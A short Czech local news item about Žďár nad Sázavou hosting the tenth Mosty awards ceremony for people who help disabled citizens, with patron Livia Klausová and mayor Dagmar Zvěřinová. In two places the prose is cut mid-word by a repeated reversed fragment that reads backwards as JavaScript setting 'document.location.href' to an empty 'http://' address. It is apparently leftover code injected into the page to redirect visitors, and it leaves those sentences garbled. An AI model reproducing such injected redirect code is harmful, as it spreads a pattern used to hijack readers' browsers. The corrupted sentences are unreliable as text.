Žďár nad Sázavou, zdar nad sazavou, aktuality, Mosty
Rainbow page separator

Žďár se připravuje na Mosty 2012

Sobota, 9. března 2013

Žďár nad Sázavou / Celkem 150 tisíc korun vložila žďárská radnice do organizace prestižní akce Mosty 2012. Na tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to cenu je nominováno celkem dvacet jednotlivců a organizací z celé České republiky ve čtyřech kategoriích.

Již 10. ročník slavnostního udílení výročních cen Národní rady osob se zdravotním postižením se uskuteční 21. března ve žďárském Domě kultury. Patronkou akce je Livia Klausová, kterou přivítá žďárská starostka Dagmar Zvěřinová.

„Cílem té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to akce je poděkování lidem, kteří se nějakým způsobem snaží ulehčit život našim zdravotně postiženým spoluobčanům,“ uvedla Dagmar Zvěřinová. Dodala, že slavnostní večer bude pojat nejenom jako udílení cen, ale zároveň i jako forma poděkování všem lidem, kteří se zdravotně postiženými občany pracují.

V doprovodném programu se mimo jiné představí také žďárští umělci, například operní pěvec Jakub Pustina či dětský sbor Žďáráček.